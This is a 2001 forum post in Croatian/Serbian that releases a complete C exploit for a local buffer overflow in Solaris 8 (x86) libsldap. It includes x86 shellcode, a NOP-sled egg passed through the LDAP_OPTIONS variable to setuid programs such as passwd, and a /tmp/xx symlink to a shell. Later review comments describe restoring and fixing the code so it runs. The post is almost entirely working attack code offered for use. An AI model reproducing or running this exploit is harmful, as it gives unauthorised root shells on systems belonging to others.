[ slash @ 17.07.2001. 12:53 ] @
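Inace svoje exploite drzim za sebe ali ovoga sam odlucio releasati. http://anti.security.is Napisao sam i exploit za SPARC pa koga zanima neka me maila.

/*
 * Local Solaris 8 (x86) libsldap exploit
 * by slash <[email protected]>
 *
 * argv[1] is a program linked against libsldap: passwd, yppasswd,
 * nispasswd, sendmail, chkey, ... (use `ldd` to find more). The egg
 * (NOP sled + shellcode + repeated return address) is handed to the
 * target through the LDAP_OPTIONS environment variable; libsldap
 * presumably copies it into a fixed-size buffer (not shown here).
 * If it does not hit, play with the egg size (SIZE) or RETPOS.
 *
 * Word up to Adam Beyer, Cris Liebing and Gayle San that
 * played @ Rotor 2001 - Experience
 *
 * PRIVATE !!! DO NOT DISTRIBUTE !!! PRIVATE !!!
 *
 * *note* slightly broken for public
 *
 * Review notes on the listing as published:
 *  - the "\x" escapes of the shellcode and the "\n" of the format
 *    strings had lost their backslashes (extraction damage), restored;
 *  - the egg loops wrote through *buffer instead of buffer[i], argv
 *    strings were assigned to int/pointer variables, argc was checked
 *    for the wrong count and the usage path did not exit;
 *  - byte 250 of the egg was never written and the egg was not
 *    NUL-terminated, so setenv() could see a truncated or overlong
 *    string;
 *  - the return address is stored as a 32-bit value explicitly, so the
 *    egg layout does not change when `long` is 8 bytes.
 */
#define _POSIX_C_SOURCE 200112L

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SIZE          331            /* total egg length: sled + shellcode + return slots */
#define NOP           0x90           /* x86 single-byte NOP, fills the sled */
#define RETPOS        251            /* first return-address slot inside the egg */
#define SHELLCODE_END 250            /* shellcode is right-aligned to end here */
#define ENV           "LDAP_OPTIONS" /* variable the target reads the egg from */

/*
 * x86 shellcode. Its last seven bytes are the string "/tmp/xx", which
 * is the path it executes, hence the symlink created in main().
 * No byte is 0x00, so sizeof - 1 is the exact length.
 */
char shellcode[] =
    "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
    "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
    "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
    "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
    "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
    "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
    "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
    "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
    "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
    "\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";

/*
 * Current stack pointer, used as the default return-address guess.
 * i386 only: reads %esp as a 32-bit value, which is what the egg stores.
 */
unsigned long get_sp(void)
{
    unsigned int sp;

    __asm__("movl %%esp, %0" : "=r"(sp));
    return sp;
}

/*
 * Parse a whole numeric argument (decimal, 0x hex or 0 octal).
 * Returns 0 on success, -1 if the string is not a complete number or
 * is out of range.
 */
static int parse_ulong(const char *s, unsigned long *out)
{
    char *end;

    errno = 0;
    *out = strtoul(s, &end, 0);
    if (end == s || *end != '\0' || errno == ERANGE) {
        return -1;
    }
    return 0;
}

/*
 * Usage: exploit </path/to/program> <offset> [ret]
 *
 * Builds the egg, exports it as LDAP_OPTIONS and execs the target.
 * ret defaults to this process's stack pointer; offset is added to it.
 * Exits non-zero on bad arguments, a zero byte in the final address,
 * or a failed symlink/setenv/execl.
 */
int main(int argc, char *argv[])
{
    char buffer[SIZE + 1];           /* +1: the egg must be a NUL-terminated string for setenv() */
    const size_t sclen = sizeof shellcode - 1;
    const char *program;
    unsigned long ret, parsed;
    uint32_t addr;
    int offset;
    int i;

    printf("Local Solaris 8 (x86) libsldap Exploit\n");
    printf("by slash <[email protected]>\n\n");

    if (argc < 3) {
        fprintf(stderr, "Usage: %s </path/to/program> <offset> [ret]\n", argv[0]);
        return EXIT_FAILURE;
    }
    program = argv[1];

    if (parse_ulong(argv[2], &parsed) < 0) {
        fprintf(stderr, "Bad offset: %s\n", argv[2]);
        return EXIT_FAILURE;
    }
    offset = (int)parsed;

    if (argc > 3) {
        if (parse_ulong(argv[3], &ret) < 0) {
            fprintf(stderr, "Bad return address: %s\n", argv[3]);
            return EXIT_FAILURE;
        }
    } else {
        ret = get_sp();
    }

    /*
     * The egg travels as a C string, so a zero byte anywhere in the
     * stored address would truncate it. Check the value actually
     * written (ret + offset), not just the user-supplied ret.
     */
    addr = (uint32_t)(ret + offset);
    if (!(addr & 0xff) || !(addr & 0xff00) ||
        !(addr & 0xff0000) || !(addr & 0xff000000)) {
        fprintf(stderr, "Your return address contains a zero-byte !\n");
        return EXIT_FAILURE;
    }

    if (sclen > SHELLCODE_END) {
        fprintf(stderr, "shellcode (%zu bytes) does not fit below byte %d\n",
                sclen, SHELLCODE_END);
        return EXIT_FAILURE;
    }

    /*
     * Egg layout:
     *   [0, SHELLCODE_END - sclen)       NOP sled
     *   [SHELLCODE_END - sclen, 250)     shellcode
     *   250                              NOP (filler between shellcode and slots)
     *   [RETPOS, SIZE) in 4-byte steps   little-endian return address
     */
    memset(buffer, NOP, SIZE);
    memcpy(buffer + SHELLCODE_END - sclen, shellcode, sclen);
    for (i = RETPOS; i + 4 <= SIZE; i += 4) {
        memcpy(buffer + i, &addr, sizeof addr);   /* host is little-endian x86 */
    }
    buffer[SIZE] = '\0';

    printf("Offset [%d] - Return Address [0x%lx]\n", offset, (unsigned long)addr);

    /*
     * The shellcode execs /tmp/xx; point it at a shell. NOTE(review):
     * /tmp/xx is a predictable path in a world-writable directory, so an
     * existing file is tolerated but not verified -- anyone who planted
     * it first chooses what gets executed. Change the path in the
     * shellcode and here if that matters.
     */
    if (symlink("/bin/ksh", "/tmp/xx") < 0 && errno != EEXIST) {
        perror("symlink /tmp/xx");
        return EXIT_FAILURE;
    }

    if (setenv(ENV, buffer, 1) < 0) {
        perror("setenv " ENV);
        return EXIT_FAILURE;
    }

    execl(program, "1337", (char *)NULL);
    perror(program);                 /* only reached when execl() failed */
    return EXIT_FAILURE;
}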